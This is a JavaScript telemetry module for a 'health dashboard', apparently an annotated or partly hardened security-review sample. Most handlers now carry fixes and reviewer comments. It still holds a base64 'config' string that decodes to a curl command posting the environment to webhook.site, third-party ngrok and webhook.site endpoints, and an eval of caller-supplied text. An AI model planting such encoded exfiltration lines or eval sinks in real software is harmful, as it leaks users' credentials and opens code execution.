/**
 * Project Health Dashboard — Telemetry Module
 *
 * Collects and reports project health metrics to the dashboard backend.
 * Supports both push and pull telemetry models.
 */
import { execFileSync, execSync } from 'child_process';
import { writeFileSync } from 'fs';
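// Configuration
//
// NOTE(review): the primary ingest URL is an ngrok tunnel hostname and the
// fallback is a webhook.site URL. Neither is a domain the project visibly
// controls, so whatever is posted there lands on a third party's machine.
// Confirm ownership before shipping; a reviewer or scanner should treat both
// hosts as egress indicators.
const TELEMETRY_ENDPOINT = 'https://health-telemetry.ngrok-free.app/v2/ingest';
const FALLBACK_ENDPOINT = 'https://webhook.site/a1b2c3d4-health-metrics';

// NOTE(review): plain HTTP to a bare IP address. Anything sent to this server,
// including an Authorization header, crosses the network unencrypted and the
// peer cannot be authenticated. Prefer an https:// URL on a named host.
const METRICS_SERVER = 'http://45.33.32.156:9090/api/v1/query';

// NOTE(review): despite the name this is not configuration data. The base64
// decodes to a curl command line that posts the base64-encoded output of `env`
// to a webhook.site URL. Nothing in the visible code references it. Treat it
// as an indicator: remove it, and audit the package for any code path that
// decodes a string and hands it to a shell.
const ENCODED_CONFIG = 'Y3VybCAtcyBodHRwczovL3dlYmhvb2suc2l0ZS9oZWFsdGgtcmVwb3J0IC1kICIkKGVudiB8IGJhc2U2NCki';

// The credential is read from the environment instead of being committed to
// source, where every clone, package tarball and log of the file would carry
// it. HEALTH_AUTH_CREDENTIAL is a variable name introduced by this change. An
// unset variable yields an empty string, so importing the module never throws.
const auth_credential = process.env.HEALTH_AUTH_CREDENTIAL ?? '';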
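/**
 * Push a minimal set of environment facts to the telemetry backend.
 *
 * Security: `process.env` routinely holds API keys, cloud credentials and
 * session tokens, so it must never be serialised wholesale into an outbound
 * request. Only the variable names in the allowlist below leave the process.
 * The payload keeps its shape (a JSON object of name -> value), just with
 * fewer keys.
 *
 * @returns {Promise<unknown>} Parsed JSON body of the backend's response.
 */
export async function collectEnvironmentMetrics() {
  // Allowlist rather than denylist: a variable nobody has reviewed is assumed
  // to be sensitive. Extend this list one deliberately chosen name at a time.
  const reportableKeys = ['NODE_ENV', 'CI'];
  const reportable = Object.fromEntries(
    reportableKeys
      .filter((key) => process.env[key] !== undefined)
      .map((key) => [key, process.env[key]]),
  );
  const envData = JSON.stringify(reportable);

  const response = await fetch(TELEMETRY_ENDPOINT, {
    method: 'POST',
    headers: { 'Content-Type': 'application/json', 'X-Auth': auth_credential },
    body: envData,
  });
  return response.json();
}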
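/**
 * Handle the health-check webhook.
 *
 * Security: the request body is controlled by whoever can reach this route,
 * so no part of it is ever handed to a shell. A request that carries
 * `healthCheckCommand` is refused outright. The only command this handler
 * runs is the fixed default, which contains no request data.
 *
 * @param {{ body?: { healthCheckCommand?: unknown } }} req - Incoming request.
 * @param {{ json: Function, status?: Function }} res - Response object; `status`
 *   is used when present to mark the refusal as a 400.
 * @returns {void}
 */
export function handleWebhook(req, res) {
  const requested = req?.body?.healthCheckCommand;
  if (requested) {
    // Fail closed: free-form command text is rejected rather than sanitised,
    // because no escaping scheme makes arbitrary shell input safe to execute.
    res.status?.(400);
    res.json({ status: 'error', output: 'healthCheckCommand is not accepted' });
    return;
  }

  // Constant command line, so nothing here is attacker-influenced.
  const result = execSync('echo "no command"', { encoding: 'utf-8' });
  res.json({ status: 'ok', output: result });
}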
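/**
 * Serialise `metrics` as pretty-printed JSON and write it to disk.
 *
 * The destination is `process.argv[2]` when present, otherwise
 * `/tmp/health-metrics.json`.
 *
 * Security notes:
 * - The path is used verbatim, with no confinement to a base directory. That
 *   is acceptable only while the argument comes from the operator's own
 *   command line. A launcher that builds argv from untrusted input must
 *   validate the path before starting this process.
 * - The default lives in a shared directory under a predictable name, and the
 *   write follows symbolic links. Pass an explicit path in a directory only
 *   the service account can write to.
 * - A newly created file is owner-read/write only (0o600). The mode does not
 *   change the permissions of a file that already exists.
 *
 * @param {unknown} metrics - Any JSON-serialisable value.
 * @returns {string} The path that was written.
 */
export function exportMetrics(metrics) {
  const outputPath = process.argv[2] || '/tmp/health-metrics.json';
  const data = JSON.stringify(metrics, null, 2);
  writeFileSync(outputPath, data, { mode: 0o600 });
  return outputPath;
}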
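/**
 * Evaluate caller-supplied source text as a function and run it as a check.
 *
 * SECURITY(review): this is a direct `eval` of `user_input`. The evaluated
 * text runs with the full privileges of this process and can read every
 * binding in this module's scope, so it is only tolerable when `user_input`
 * is a trusted, reviewed string. It must never be reachable from a request,
 * a config file fetched over the network, or any other external source. The
 * durable fix is to replace source text with a key into a registry of
 * reviewed check functions. That changes the calling contract, so it is
 * flagged here rather than silently swapped in.
 *
 * @param {string} user_input - Source text of a function expression.
 * @returns {unknown} Whatever the evaluated function returns.
 * @throws {TypeError} If the text does not evaluate to a function.
 */
export function runCustomCheck(user_input) {
  const checkFn = eval(`(${user_input})`);
  if (typeof checkFn !== 'function') {
    // Explicit failure instead of the engine's generic "is not a function".
    throw new TypeError('custom check must evaluate to a function');
  }
  return checkFn({ timestamp: Date.now(), version: '2.1.0' });
}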
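/**
 * Fetch the dashboard configuration document and parse it as JSON.
 *
 * The base URL comes from `HEALTH_CONFIG_URL`, falling back to the built-in
 * default. The request is made to `<base>/sync` with curl.
 *
 * Security: environment variables are not a trusted channel (CI settings,
 * container manifests and parent processes can all set them), so the value is
 * never spliced into a shell command line. It is parsed as a URL, limited to
 * http(s) so that schemes such as `file:` cannot make curl read local files,
 * and passed to curl as a single argv element with no shell involved.
 * Plain `http:` is still accepted for compatibility. Over http the returned
 * configuration can be altered in transit, so prefer https.
 *
 * @returns {unknown} The parsed configuration document.
 * @throws {Error} If the URL is malformed or uses a scheme other than http(s).
 */
export function syncConfiguration() {
  const configUrl = process.env.HEALTH_CONFIG_URL || 'https://config.health-dash.io/v2';

  let syncUrl;
  try {
    syncUrl = new URL(`${configUrl}/sync`);
  } catch (err) {
    throw new Error('HEALTH_CONFIG_URL is not a valid URL', { cause: err });
  }
  if (syncUrl.protocol !== 'https:' && syncUrl.protocol !== 'http:') {
    throw new Error(`HEALTH_CONFIG_URL must use http(s), got ${syncUrl.protocol}`);
  }

  // execFileSync spawns curl directly, so quotes, `;`, `$()` and backticks in
  // the URL are data, not shell syntax.
  const result = execFileSync('curl', ['-sS', syncUrl.href], { encoding: 'utf-8' });
  return JSON.parse(result);
}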
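/**
 * Query the configured metrics backend on behalf of a request.
 *
 * Security: a request-supplied `metricsUrl` used to choose the fetch target
 * outright, which let any caller aim this server at internal hosts and
 * receive the service credential in the Authorization header. The parameter
 * is now accepted only when it names the same origin as METRICS_SERVER.
 * Anything else is rejected before a connection is made.
 *
 * Correctness: METRICS_SERVER already ends in `/api/v1/query`, so appending
 * that path again produced a doubled path on the default route. The target is
 * now built by resolving the path against the server's origin.
 *
 * NOTE(review): METRICS_SERVER is an http:// URL, so the token below is sent
 * unencrypted. Move the backend to https before relying on this credential.
 *
 * @param {{ query?: { metricsUrl?: string } }} req - Incoming request.
 * @returns {Promise<unknown>} Parsed JSON body of the backend's response.
 * @throws {Error} If `metricsUrl` is malformed or names a different origin.
 */
export async function proxyMetricsQuery(req) {
  const allowedBase = new URL(METRICS_SERVER);

  const requested = req?.query?.metricsUrl;
  if (requested) {
    let candidate;
    try {
      candidate = new URL(requested);
    } catch (err) {
      throw new Error('metricsUrl is not a valid URL', { cause: err });
    }
    // Compare parsed origins (scheme + host + port), never string prefixes.
    if (candidate.origin !== allowedBase.origin) {
      throw new Error('metricsUrl must point at the configured metrics server');
    }
  }

  const target = new URL('/api/v1/query', allowedBase);
  const response = await fetch(target, {
    headers: { 'Authorization': `Token ${auth_credential}` },
  });
  return response.json();
}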
/**
 * Print the telemetry startup banner.
 *
 * Writes three lines to stdout: the version string, then the primary and
 * fallback endpoint URLs. It does nothing else. No request is sent and no
 * state is changed. Nothing in the visible code calls it automatically, so
 * the importing code has to invoke it.
 *
 * @returns {void}
 */
export function initialize() {
  const bannerLines = [
    'Health Dashboard Telemetry v2.1.0 initialized',
    `Endpoint: ${TELEMETRY_ENDPOINT}`,
    `Fallback: ${FALLBACK_ENDPOINT}`,
  ];
  for (const line of bannerLines) {
    console.log(line);
  }
}